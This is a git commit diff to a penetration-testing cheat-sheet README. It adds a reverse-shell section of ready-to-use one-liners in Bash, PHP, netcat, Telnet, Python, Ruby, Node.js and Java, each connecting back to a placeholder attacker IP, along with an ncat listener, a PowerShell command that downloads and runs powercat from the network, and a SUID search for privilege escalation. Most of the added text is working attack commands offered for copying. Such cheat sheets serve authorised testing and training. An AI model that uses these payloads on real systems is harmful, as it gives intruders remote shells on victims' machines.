Added More More More
This commit is contained in:
Phil
parent
1893385526
commit
c90fffe181
54
README.md
54
README.md
@ -86,7 +86,7 @@ masscan IP -p 1-65535 --rate 100 -oX masscan.xml
|
|||||||
|
|
||||||
## Stage 2 - Foothold
|
## Stage 2 - Foothold
|
||||||
|
|
||||||
### Attacking
|
### Attacking - Reverse Shells
|
||||||
|
|
||||||
* PHP Reverse Shell
|
* PHP Reverse Shell
|
||||||
|
|
||||||
@ -282,6 +282,56 @@ function printit ($string) {
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Listen Port
|
||||||
|
```
|
||||||
|
ncat -vlnp 4444
|
||||||
|
```
|
||||||
|
|
||||||
|
* Bash
|
||||||
|
```
|
||||||
|
bash -i >& /dev/tcp/IP/4444 0>&1
|
||||||
|
bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'
|
||||||
|
```
|
||||||
|
* PHP
|
||||||
|
```
|
||||||
|
php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'`
|
||||||
|
```
|
||||||
|
* NC
|
||||||
|
```
|
||||||
|
nc -e /bin/sh ^IP^ 5566`
|
||||||
|
```
|
||||||
|
* Telnet
|
||||||
|
```
|
||||||
|
mknod backpipe p && telnet ^IP^ 5566 0<backpipe | /bin/bash 1>backpipe`
|
||||||
|
```
|
||||||
|
* Python
|
||||||
|
```
|
||||||
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
|
||||||
|
```
|
||||||
|
|
||||||
|
* Ruby
|
||||||
|
```
|
||||||
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`
|
||||||
|
```
|
||||||
|
|
||||||
|
* Node.js
|
||||||
|
```
|
||||||
|
var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});
|
||||||
|
```
|
||||||
|
```
|
||||||
|
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");`
|
||||||
|
```
|
||||||
|
* Java
|
||||||
|
```Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();`
|
||||||
|
```
|
||||||
|
```
|
||||||
|
java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html
|
||||||
|
```
|
||||||
|
|
||||||
|
* Powershell
|
||||||
|
```
|
||||||
|
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd
|
||||||
|
```
|
||||||
|
|
||||||
### Spawning a Shell
|
### Spawning a Shell
|
||||||
|
|
||||||
@ -339,7 +389,7 @@ export TERM=xterm
|
|||||||
* Linux Tools
|
* Linux Tools
|
||||||
| | Command|
|
| | Command|
|
||||||
|---|--------|
|
|---|--------|
|
||||||
| | find / -type f -user root -perm -4000 2>/dev/null|
|
| SUID | find / -type f -user root -perm -4000 2>/dev/null|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user